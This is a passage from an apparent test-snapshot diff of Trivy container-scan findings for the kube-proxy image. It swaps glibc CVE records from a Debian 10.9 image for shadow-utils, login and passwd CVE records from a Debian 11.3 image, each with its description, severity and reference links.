"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "MEDIUM", 